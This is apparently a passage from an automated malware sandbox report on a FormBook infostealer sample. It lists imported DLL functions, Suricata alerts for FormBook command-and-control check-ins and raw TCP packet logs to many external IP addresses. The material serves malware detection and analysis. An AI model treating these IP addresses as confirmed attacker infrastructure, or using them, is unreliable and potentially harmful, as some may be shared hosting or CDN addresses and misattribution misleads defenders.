OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T08:28:46.739000+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49785	160.25.166.123	80	TCP
2025-01-09T08:30:06.882396+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49713	194.9.94.85	80	TCP
2025-01-09T08:30:22.438252+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49714	45.33.23.183	80	TCP
2025-01-09T08:30:25.103389+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49715	45.33.23.183	80	TCP
2025-01-09T08:30:27.780997+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49716	45.33.23.183	80	TCP
2025-01-09T08:30:30.448977+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49717	45.33.23.183	80	TCP
2025-01-09T08:30:36.487865+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49718	104.21.64.1	80	TCP
2025-01-09T08:30:39.114808+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49719	104.21.64.1	80	TCP
2025-01-09T08:30:41.758679+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49720	104.21.64.1	80	TCP
2025-01-09T08:30:44.403119+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49721	104.21.64.1	80	TCP
2025-01-09T08:30:49.973027+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49722	199.192.21.169	80	TCP
2025-01-09T08:30:52.682343+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49723	199.192.21.169	80	TCP
2025-01-09T08:30:55.381122+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49724	199.192.21.169	80	TCP
2025-01-09T08:30:58.083788+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49725	199.192.21.169	80	TCP
2025-01-09T08:31:12.876534+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49726	47.83.1.90	80	TCP
2025-01-09T08:31:15.662834+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49727	47.83.1.90	80	TCP
2025-01-09T08:31:18.507822+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49728	47.83.1.90	80	TCP
2025-01-09T08:31:21.375336+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49729	47.83.1.90	80	TCP
2025-01-09T08:31:26.858665+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49730	13.248.169.48	80	TCP
2025-01-09T08:31:29.529567+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49731	13.248.169.48	80	TCP
2025-01-09T08:31:32.205590+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49732	13.248.169.48	80	TCP
2025-01-09T08:31:34.876866+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49733	13.248.169.48	80	TCP
2025-01-09T08:31:41.263205+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49734	160.25.166.123	80	TCP
2025-01-09T08:31:44.145333+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49735	160.25.166.123	80	TCP
2025-01-09T08:31:47.003606+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49736	160.25.166.123	80	TCP
2025-01-09T08:31:49.894055+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49737	160.25.166.123	80	TCP
2025-01-09T08:31:55.304929+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49738	172.67.132.227	80	TCP
2025-01-09T08:31:57.950883+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49739	172.67.132.227	80	TCP
2025-01-09T08:32:00.588502+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49740	172.67.132.227	80	TCP
2025-01-09T08:32:03.248795+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49741	172.67.132.227	80	TCP
2025-01-09T08:32:19.097553+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49742	136.243.64.147	80	TCP
2025-01-09T08:32:21.854287+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49743	136.243.64.147	80	TCP
2025-01-09T08:32:24.612958+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49744	136.243.64.147	80	TCP
2025-01-09T08:32:27.370105+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49745	136.243.64.147	80	TCP
2025-01-09T08:32:33.368776+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49746	202.95.11.110	80	TCP
2025-01-09T08:32:36.202931+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49747	202.95.11.110	80	TCP
2025-01-09T08:32:39.045962+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49748	202.95.11.110	80	TCP
2025-01-09T08:32:42.060951+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49749	202.95.11.110	80	TCP
2025-01-09T08:32:47.538449+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49750	76.223.54.146	80	TCP
2025-01-09T08:32:50.200934+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49751	76.223.54.146	80	TCP
2025-01-09T08:32:52.877471+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49752	76.223.54.146	80	TCP
2025-01-09T08:32:55.548709+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49753	76.223.54.146	80	TCP
2025-01-09T08:33:01.167022+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49754	103.106.67.112	80	TCP
2025-01-09T08:33:03.869988+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49755	103.106.67.112	80	TCP
2025-01-09T08:33:07.823624+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49756	103.106.67.112	80	TCP
2025-01-09T08:33:09.276294+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49757	103.106.67.112	80	TCP
2025-01-09T08:33:15.037580+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49758	104.21.64.1	80	TCP
2025-01-09T08:33:17.493557+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49759	104.21.64.1	80	TCP
2025-01-09T08:33:20.202664+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49760	104.21.64.1	80	TCP
2025-01-09T08:33:22.889209+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49761	104.21.64.1	80	TCP
2025-01-09T08:33:39.628725+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49762	194.9.94.85	80	TCP
2025-01-09T08:33:44.949091+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49763	45.33.23.183	80	TCP
2025-01-09T08:33:47.607861+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49764	45.33.23.183	80	TCP
2025-01-09T08:33:50.282769+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49765	45.33.23.183	80	TCP
2025-01-09T08:33:52.951673+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49766	45.33.23.183	80	TCP
2025-01-09T08:33:58.644238+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49767	104.21.64.1	80	TCP
2025-01-09T08:34:01.250813+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49768	104.21.64.1	80	TCP
2025-01-09T08:34:03.919071+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49769	104.21.64.1	80	TCP
2025-01-09T08:34:06.564729+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49770	104.21.64.1	80	TCP
2025-01-09T08:34:11.943783+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49771	199.192.21.169	80	TCP
2025-01-09T08:34:14.648707+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49772	199.192.21.169	80	TCP
2025-01-09T08:34:17.349309+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49773	199.192.21.169	80	TCP
2025-01-09T08:34:20.050156+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49774	199.192.21.169	80	TCP
2025-01-09T08:34:36.701257+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49775	47.83.1.90	80	TCP
2025-01-09T08:34:39.559555+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49776	47.83.1.90	80	TCP
2025-01-09T08:34:42.340276+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49777	47.83.1.90	80	TCP
2025-01-09T08:34:45.197545+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49778	47.83.1.90	80	TCP
2025-01-09T08:34:50.485909+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49779	13.248.169.48	80	TCP
2025-01-09T08:34:53.158591+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49780	13.248.169.48	80	TCP
2025-01-09T08:34:56.841845+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49781	13.248.169.48	80	TCP
2025-01-09T08:34:59.515755+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49782	13.248.169.48	80	TCP
2025-01-09T08:35:05.235338+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49783	160.25.166.123	80	TCP
2025-01-09T08:35:08.105254+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49784	160.25.166.123	80	TCP
2025-01-09T08:35:13.864903+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49786	160.25.166.123	80	TCP
2025-01-09T08:35:19.126359+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49787	172.67.132.227	80	TCP
2025-01-09T08:35:21.778267+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49788	172.67.132.227	80	TCP
2025-01-09T08:35:24.424871+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49789	172.67.132.227	80	TCP
2025-01-09T08:35:27.064785+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49790	172.67.132.227	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 08:30:06.394444942 CET	49713	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:30:06.635220051 CET	80	49713	194.9.94.85	192.168.11.20
Jan 9, 2025 08:30:06.635428905 CET	49713	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:30:06.637901068 CET	49713	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:30:06.876455069 CET	80	49713	194.9.94.85	192.168.11.20
Jan 9, 2025 08:30:06.881885052 CET	80	49713	194.9.94.85	192.168.11.20
Jan 9, 2025 08:30:06.882102013 CET	80	49713	194.9.94.85	192.168.11.20
Jan 9, 2025 08:30:06.882180929 CET	80	49713	194.9.94.85	192.168.11.20
Jan 9, 2025 08:30:06.882354975 CET	80	49713	194.9.94.85	192.168.11.20
Jan 9, 2025 08:30:06.882385015 CET	80	49713	194.9.94.85	192.168.11.20
Jan 9, 2025 08:30:06.882396936 CET	80	49713	194.9.94.85	192.168.11.20
Jan 9, 2025 08:30:06.882395983 CET	49713	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:30:06.882733107 CET	49713	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:30:06.883419991 CET	49713	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:30:07.124105930 CET	80	49713	194.9.94.85	192.168.11.20
Jan 9, 2025 08:30:22.146543980 CET	49714	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:22.288686037 CET	80	49714	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:22.289004087 CET	49714	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:22.292313099 CET	49714	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:22.437994957 CET	80	49714	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:22.438010931 CET	80	49714	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:22.438251972 CET	49714	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:23.797060966 CET	49714	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:24.813138962 CET	49715	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:24.954868078 CET	80	49715	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:24.955079079 CET	49715	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:24.958570957 CET	49715	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:25.103106976 CET	80	49715	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:25.103125095 CET	80	49715	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:25.103389025 CET	49715	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:26.468858004 CET	49715	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:27.485631943 CET	49716	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:27.627639055 CET	80	49716	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:27.627923965 CET	49716	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:27.634288073 CET	49716	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:27.634341002 CET	49716	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:27.634361982 CET	49716	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:27.776794910 CET	80	49716	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:27.776803970 CET	80	49716	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:27.776809931 CET	80	49716	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:27.777123928 CET	80	49716	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:27.777276039 CET	80	49716	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:27.777486086 CET	80	49716	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:27.780854940 CET	80	49716	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:27.780865908 CET	80	49716	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:27.780997038 CET	49716	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:29.140089035 CET	49716	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:30.157048941 CET	49717	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:30.299041986 CET	80	49717	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:30.299223900 CET	49717	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:30.303564072 CET	49717	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:30.448632002 CET	80	49717	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:30.448642969 CET	80	49717	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:30.448652029 CET	80	49717	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:30.448976994 CET	49717	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:30.450316906 CET	49717	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:30:30.592313051 CET	80	49717	45.33.23.183	192.168.11.20
Jan 9, 2025 08:30:35.805249929 CET	49718	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:35.923717022 CET	80	49718	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:35.923918009 CET	49718	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:35.930080891 CET	49718	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:36.048763037 CET	80	49718	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:36.487658024 CET	80	49718	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:36.487751961 CET	80	49718	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:36.487761974 CET	80	49718	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:36.487864971 CET	49718	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:36.488373995 CET	80	49718	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:36.488516092 CET	49718	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:37.434698105 CET	49718	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:38.451035976 CET	49719	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:38.570221901 CET	80	49719	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:38.570369005 CET	49719	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:38.573808908 CET	49719	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:38.692795992 CET	80	49719	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:39.114554882 CET	80	49719	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:39.114563942 CET	80	49719	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:39.114691019 CET	80	49719	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:39.114808083 CET	49719	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:39.114856005 CET	49719	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:40.074728966 CET	49719	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:41.091927052 CET	49720	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:41.210532904 CET	80	49720	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:41.210846901 CET	49720	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:41.217196941 CET	49720	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:41.217281103 CET	49720	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:41.336021900 CET	80	49720	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:41.336327076 CET	80	49720	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:41.336368084 CET	80	49720	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:41.336467028 CET	80	49720	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:41.336831093 CET	80	49720	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:41.758476019 CET	80	49720	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:41.758486032 CET	80	49720	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:41.758678913 CET	49720	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:41.759299994 CET	80	49720	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:41.759489059 CET	49720	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:42.730950117 CET	49720	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:43.746509075 CET	49721	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:43.865154982 CET	80	49721	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:43.865365982 CET	49721	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:43.867697954 CET	49721	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:43.986243963 CET	80	49721	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:44.402524948 CET	80	49721	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:44.402535915 CET	80	49721	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:44.403119087 CET	49721	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:44.403624058 CET	80	49721	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:44.403821945 CET	49721	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:44.405002117 CET	49721	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:30:44.523377895 CET	80	49721	104.21.64.1	192.168.11.20
Jan 9, 2025 08:30:49.603780985 CET	49722	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:49.775978088 CET	80	49722	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:49.776335955 CET	49722	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:49.779701948 CET	49722	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:49.952063084 CET	80	49722	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:49.972877026 CET	80	49722	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:49.972887039 CET	80	49722	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:49.973026991 CET	49722	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:51.291344881 CET	49722	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:52.308315992 CET	49723	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:52.480554104 CET	80	49723	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:52.480720043 CET	49723	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:52.486866951 CET	49723	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:52.659377098 CET	80	49723	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:52.682185888 CET	80	49723	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:52.682197094 CET	80	49723	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:52.682343006 CET	49723	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:53.993948936 CET	49723	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:55.009768963 CET	49724	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:55.182132006 CET	80	49724	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:55.182415962 CET	49724	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:55.185892105 CET	49724	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:55.185915947 CET	49724	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:55.185981035 CET	49724	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:55.358449936 CET	80	49724	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:55.358722925 CET	80	49724	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:55.358988047 CET	80	49724	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:55.359195948 CET	80	49724	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:55.359205008 CET	80	49724	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:55.380884886 CET	80	49724	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:55.380897999 CET	80	49724	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:55.381122112 CET	49724	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:56.696155071 CET	49724	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:57.712445974 CET	49725	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:57.884521008 CET	80	49725	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:57.884844065 CET	49725	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:57.887201071 CET	49725	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:58.059346914 CET	80	49725	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:58.083355904 CET	80	49725	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:58.083365917 CET	80	49725	199.192.21.169	192.168.11.20
Jan 9, 2025 08:30:58.083787918 CET	49725	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:58.084446907 CET	49725	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:30:58.256409883 CET	80	49725	199.192.21.169	192.168.11.20
Jan 9, 2025 08:31:11.550249100 CET	49726	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:11.857682943 CET	80	49726	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:11.857916117 CET	49726	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:11.861418962 CET	49726	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:12.168885946 CET	80	49726	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:12.876347065 CET	80	49726	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:12.876357079 CET	80	49726	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:12.876533985 CET	49726	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:13.364343882 CET	49726	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:14.381542921 CET	49727	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:14.679574013 CET	80	49727	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:14.679713964 CET	49727	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:14.683212042 CET	49727	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:14.981236935 CET	80	49727	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:15.662391901 CET	80	49727	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:15.662583113 CET	80	49727	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:15.662833929 CET	49727	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:16.191886902 CET	49727	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:17.207902908 CET	49728	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:17.517025948 CET	80	49728	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:17.517256021 CET	49728	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:17.520756006 CET	49728	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:17.520816088 CET	49728	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:17.829741955 CET	80	49728	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:17.829967976 CET	80	49728	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:17.829977989 CET	80	49728	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:17.830281973 CET	80	49728	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:17.830291986 CET	80	49728	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:17.830539942 CET	80	49728	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:18.507646084 CET	80	49728	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:18.507658005 CET	80	49728	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:18.507822037 CET	49728	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:19.034965992 CET	49728	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:20.051054001 CET	49729	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:20.362123966 CET	80	49729	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:20.362334013 CET	49729	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:20.364701986 CET	49729	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:20.675746918 CET	80	49729	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:21.375008106 CET	80	49729	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:21.375020981 CET	80	49729	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:21.375335932 CET	49729	80	192.168.11.20	47.83.1.90
